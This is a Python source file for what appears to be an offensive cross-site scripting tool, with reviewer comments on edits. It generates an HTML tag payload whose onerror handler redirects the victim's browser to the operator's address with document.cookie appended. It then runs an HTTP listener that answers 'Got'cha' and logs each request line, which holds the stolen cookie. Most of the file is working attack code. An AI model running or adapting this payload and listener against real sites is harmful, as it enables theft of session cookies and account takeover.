#!/usr/bin/env python
import util
import sys
import http.server
import socketserver
from http.server import HTTPServer, BaseHTTPRequestHandler
def getCookieAddress(address, port):
    """Return the JavaScript expression that appends document.cookie to the listener URL.

    The result is source text for a JavaScript expression (a quoted URL
    prefix followed by ``+document.cookie``), not a finished URL.  The port
    is left out of the URL when it is 80.

    Args:
        address: Host name or IP address of the listener.
        port: TCP port of the listener; formatted with ``%d``.

    Returns:
        The expression as a ``str``.
    """
    # Port 80 is the http default, so only other ports are spelled out.
    authority = address if port == 80 else "%s:%d" % (address, port)
    return "'http://%s/?x='+document.cookie" % authority
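def generatePayload(type, address, port):
    """Build the test markup for one HTML tag type.

    Args:
        type: Tag name, already lower-cased by the caller.  The parameter
            name shadows the ``type`` builtin; it is kept because it is part
            of the function's interface.
        address: Listener host, passed through to getCookieAddress().
        port: Listener port, passed through to getCookieAddress().

    Returns:
        The generated markup as a ``str`` (entries joined by newlines), or
        ``None`` when ``type`` is not one of the supported tags.
    """
    payloads = []
    cookieAddress = getCookieAddress(address, port)
    media_tags = ["img", "audio", "video", "image", "body", "script", "object"]
    if type in media_tags:
        # address/port are interpolated without escaping; in this file they
        # come from the operator's own command line and util.getAddress().
        payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress))
    # NOTE(review): the original had a second, script-only entry whose
    # template was an empty string.  '' % cookieAddress raises TypeError
    # ("not all arguments converted"), so type == "script" always crashed.
    # The intended template is not present in this file, so the entry is
    # omitted instead of guessed; restore it here once the text is known.
    if not payloads:
        return None
    return "\n".join(payloads)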
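class XssServer(BaseHTTPRequestHandler):
    """Request handler that answers every GET/HEAD/POST with the same page.

    The handler never inspects the request path or body itself.  The
    requested path (including any ``?x=...`` query string) is visible only
    through the request line that BaseHTTPRequestHandler logs to stderr
    when send_response() is called.
    """

    def _set_headers(self):
        """Send a 200 status line and the Content-type header."""
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()

    def _html(self):
        """Return the fixed response body as UTF-8 bytes."""
        # The original literal was an f-string opened with a single double
        # quote and continued over three lines, which is a SyntaxError and
        # kept the whole module from loading.  Only the text below is
        # visible in the source; any markup that surrounded it is not.
        content = "\nGot'cha\n"
        return content.encode("utf8")  # wfile.write() needs bytes

    def do_GET(self):
        """Reply to GET with the headers and the fixed body."""
        self._set_headers()
        self.wfile.write(self._html())

    def do_HEAD(self):
        """Reply to HEAD with the headers only."""
        self._set_headers()

    def do_POST(self):
        """Reply to POST with the headers and the fixed body.

        The request body is not read.
        """
        self._set_headers()
        self.wfile.write(self._html())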
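if __name__ == "__main__":
    # Command line: the tag type is required, the listener port is optional.
    if len(sys.argv) < 2:
        # The usage text previously omitted the name of the required argument.
        print("Usage: %s <type> [port]" % sys.argv[0])
        sys.exit(1)

    listen_port = None
    if len(sys.argv) >= 3:
        # Reject a non-numeric or out-of-range port with a message instead of
        # a traceback.  Port 0 is rejected too: HTTPServer would bind a random
        # port while the printed markup would still point at port 0.
        try:
            listen_port = int(sys.argv[2])
        except ValueError:
            print("Invalid port: %s" % sys.argv[2])
            sys.exit(1)
        if not 0 < listen_port < 65536:
            print("Invalid port: %s" % sys.argv[2])
            sys.exit(1)

    payload_type = sys.argv[1].lower()
    local_address = util.getAddress()

    # No port given: ask util.openServer() for a socket, read the port it got,
    # then release it so HTTPServer can bind the same port below.
    # NOTE(review): another process can take the port between sock.close()
    # and the HTTPServer bind; the bind then fails with OSError.
    if listen_port is None:
        sock = util.openServer(local_address)
        if not sock:
            sys.exit(1)
        listen_port = sock.getsockname()[1]
        sock.close()

    payload = generatePayload(payload_type, local_address, listen_port)
    if not payload:
        print("Unsupported payload type")
        sys.exit(1)

    print("Payload:")
    print(payload)
    print()

    httpd = HTTPServer((local_address, listen_port), XssServer)
    print(f"Starting httpd server on {local_address}:{listen_port}")
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        # Ctrl-C is the normal way to stop the listener; exit without a traceback.
        print()
    finally:
        # Release the listening socket so the port is free right after the run.
        httpd.server_close()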